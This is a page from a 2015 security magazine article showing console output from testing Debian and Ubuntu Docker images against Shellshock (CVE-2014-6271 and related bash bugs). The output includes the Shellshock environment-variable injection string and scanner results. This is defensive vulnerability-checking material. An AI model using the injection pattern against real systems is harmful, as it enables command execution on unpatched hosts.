Page 55 - index
P. 55
..
Run build docker: debian:7.3, id: fae1bc04-b514_debian:7.3
./docker_launcher.py -c 'env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"' -t fae1bc04-b514_debian:7.3
['ssh', '-i', '/root/dev/distro_checker/extras/docker/faraday-docker.prv', '-t', '-t', '-oStrictHostKeyChecking=no', '-o
UserKnownHostsFile=/dev/null', '-o LogLevel=quiet', '-X', u'[email protected]', 'env x=\'() { :;}; echo vulnerable\'
bash -c "echo this is a test"']
vulnerable
this is a test
Run build docker: ubuntu:14.10, id: a07132a4-af14_ubuntu:14.10
./docker_launcher.py -c 'env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"' -t a07132a4-
af14_ubuntu:14.10
['ssh', '-i', '/root/dev/distro_checker/extras/docker/faraday-docker.prv', '-t', '-t', '-oStrictHostKeyChecking=no', '-o
UserKnownHostsFile=/dev/null', '-o LogLevel=quiet', '-X', u'[email protected]', 'env x=\'() { :;}; echo vulnerable\'
bash -c "echo this is a test"']
this is a test
This creates 2 images (debian7.3, ubuntu 14.10) and for each image, you have to execute the
exploit CVE-2014-6271
We can utilize a script to make it a little more organized;
$ ./docker_build.py -c "cd build && ./shellshocker.sh" #docker_build.py copy in the images all the content "." in the
directory ./root/build
Run build docker: debian:7.3, id: 75b78a22-03a1_debian:7.3
CVE-2014-6271 (original shellshock): VULNERABLE
./shellshock_test2.sh: line 17: 29 Segmentation fault shellshocker="() { x() { _;}; x() { _;} <
CVE-2014-6277 (segfault): VULNERABLE
CVE-2014-6278 (Florian's patch): VULNERABLE
CVE-2014-7169 (taviso bug): VULNERABLE
CVE-2014-7186 (redir_stack bug): not vulnerable
CVE-2014-7187 (nested loops off by one): not vulnerable
CVE-2014-//// (exploit 3 on http://shellshocker.net/): not vulnerable
55 Cyber Warnings E-Magazine – August 2015 Edition
Copyright © Cyber Defense Magazine, All rights reserved worldwide
